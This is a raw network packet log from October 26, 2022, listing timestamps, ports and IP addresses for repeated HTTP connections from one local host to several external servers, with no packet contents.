Oct 26, 2022 13:17:41.625098944 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625135899 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.625137091 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625359058 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.625408888 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625570059 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625574112 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.625611067 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625755072 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.625792027 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.625895023 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.625937939 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.626190901 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.633917093 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.633970976 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634063959 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634109974 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.634180069 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.634258032 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.634493113 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634543896 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634582996 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634789944 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634882927 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.634934902 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.634959936 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.634984016 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.635117054 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.635148048 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.635277033 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.635333061 CEST	49884	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:41.635337114 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.635410070 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.643451929 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.643507004 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.644023895 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.644471884 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.644521952 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.645016909 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.685138941 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.918575048 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.918663025 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.918706894 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:41.918764114 CEST	80	49884	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.637089968 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.646492004 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.646738052 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.646823883 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.656208038 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935406923 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935532093 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935626030 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935715914 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935775995 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.935776949 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.935838938 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:43.936068058 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.936068058 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.936346054 CEST	49885	80	192.168.11.20	188.114.96.3
Oct 26, 2022 13:17:43.945780993 CEST	80	49885	188.114.96.3	192.168.11.20
Oct 26, 2022 13:17:49.153353930 CEST	49886	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:49.276098967 CEST	80	49886	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:49.276456118 CEST	49886	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:49.276556969 CEST	49886	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:49.399163008 CEST	80	49886	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:49.405298948 CEST	80	49886	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:49.405354977 CEST	80	49886	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:49.405623913 CEST	49886	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:50.291564941 CEST	49886	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:51.307266951 CEST	49887	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:51.425630093 CEST	80	49887	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:51.425909042 CEST	49887	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:51.426004887 CEST	49887	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:51.544200897 CEST	80	49887	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:51.549825907 CEST	80	49887	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:51.549869061 CEST	80	49887	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:51.549978971 CEST	49887	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:52.431945086 CEST	49887	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.447279930 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.569804907 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.570045948 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.570583105 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.570669889 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.693312883 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693404913 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693463087 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693516016 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693536043 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.693584919 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.693660975 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693682909 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.693734884 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693778992 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693820953 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.693867922 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.693924904 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.694031954 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.694201946 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.816447020 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.816523075 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.816570044 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.816612005 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.816736937 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.816811085 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.816946030 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.816997051 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817042112 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817082882 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817118883 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817156076 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817198992 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817210913 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:53.817275047 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817312956 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817486048 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817533016 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817656040 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817764997 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.817809105 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.939924955 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940063000 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940126896 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940181971 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940233946 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940285921 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940386057 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940443039 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940495968 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940547943 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.940598965 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.943002939 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.943097115 CEST	80	49888	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:53.943444967 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:54.571702003 CEST	49888	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.587568998 CEST	49889	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.706479073 CEST	80	49889	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:55.706893921 CEST	49889	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.706895113 CEST	49889	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.825794935 CEST	80	49889	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:55.831473112 CEST	80	49889	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:55.831571102 CEST	80	49889	74.208.236.144	192.168.11.20
Oct 26, 2022 13:17:55.831926107 CEST	49889	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.832089901 CEST	49889	80	192.168.11.20	74.208.236.144
Oct 26, 2022 13:17:55.950530052 CEST	80	49889	74.208.236.144	192.168.11.20
Oct 26, 2022 13:18:01.167385101 CEST	49890	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:01.347130060 CEST	80	49890	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:01.347326040 CEST	49890	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:01.347455025 CEST	49890	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:01.527409077 CEST	80	49890	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:01.527641058 CEST	49890	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:02.351356983 CEST	49890	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:03.380822897 CEST	49891	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:03.560540915 CEST	80	49891	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:03.560812950 CEST	49891	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:03.561152935 CEST	49891	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:03.741077900 CEST	80	49891	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:03.741307974 CEST	49891	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:04.569833994 CEST	49891	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.585341930 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.767301083 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.767690897 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.768318892 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.950493097 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.950602055 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.950678110 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.950758934 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.950762033 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.950835943 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:05.950885057 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.951107025 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.951215029 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:05.951215029 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:06.132591963 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.132685900 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.132752895 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.132841110 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:06.132945061 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.132958889 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:06.133028030 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133256912 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133328915 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133476973 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133620977 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133761883 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.133829117 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.314959049 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.315041065 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.315514088 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.315721989 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.315821886 CEST	80	49892	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:06.772114992 CEST	49892	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:07.787920952 CEST	49893	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:07.967354059 CEST	80	49893	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:07.967617989 CEST	49893	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:07.967758894 CEST	49893	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:08.147358894 CEST	80	49893	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:08.147840023 CEST	49893	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:08.148180962 CEST	49893	80	192.168.11.20	207.60.131.46
Oct 26, 2022 13:18:08.327600956 CEST	80	49893	207.60.131.46	192.168.11.20
Oct 26, 2022 13:18:13.382776022 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:13.484553099 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.484797955 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:13.484931946 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:13.638712883 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.638783932 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.638839960 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.638892889 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.638932943 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.638978958 CEST	80	49894	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:13.639049053 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:13.639216900 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:13.639216900 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:14.489460945 CEST	49894	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.504889965 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.606908083 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.607116938 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.607259989 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.762092113 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766225100 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766333103 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766400099 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766452074 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766495943 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766540051 CEST	80	49895	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:15.766562939 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.766630888 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:15.766810894 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:16.613734007 CEST	49895	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.629606009 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.731628895 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.731853962 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.732384920 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.890286922 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.890589952 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.890743017 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.992631912 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.992772102 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.992815018 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.992898941 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.993004084 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.993068933 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.993206978 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:17.993319988 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.993486881 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:17.993669033 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.046173096 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.046526909 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.095088005 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095158100 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095232964 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095278025 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095325947 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095366955 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.095390081 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095436096 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095468044 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.095482111 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095525980 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.095571041 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.148781061 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.197324038 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.197390079 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.197546959 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.249967098 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254731894 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254769087 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254797935 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254827023 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254853964 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254880905 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.254889011 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.254961967 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.255004883 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.255019903 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.258989096 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.259035110 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.259167910 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.300928116 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.356818914 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.356908083 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.356971025 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357029915 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357085943 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.357136011 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357192039 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.357222080 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357285023 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357350111 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357392073 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.357436895 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357500076 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357526064 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.357584953 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357649088 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.357669115 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.357789993 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.360893011 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.360980988 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.361044884 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.361188889 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.402978897 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.403074026 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.403220892 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.457166910 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.459676981 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.459774971 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.459846973 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.459914923 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.459985018 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460016012 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.460053921 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460117102 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.460124969 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460195065 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460263968 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460309029 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.460374117 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.460380077 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460450888 CEST	80	49896	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:18.460597992 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.460598946 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:18.738440037 CEST	49896	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.753962994 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.855600119 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.855765104 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.855948925 CEST	49897	80	192.168.11.20	216.40.34.41
Oct 26, 2022 13:18:19.976070881 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976141930 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976195097 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976239920 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976291895 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976380110 CEST	80	49897	216.40.34.41	192.168.11.20
Oct 26, 2022 13:18:19.976427078 CEST	80	49897	216.40.34.41	192.168.11.20
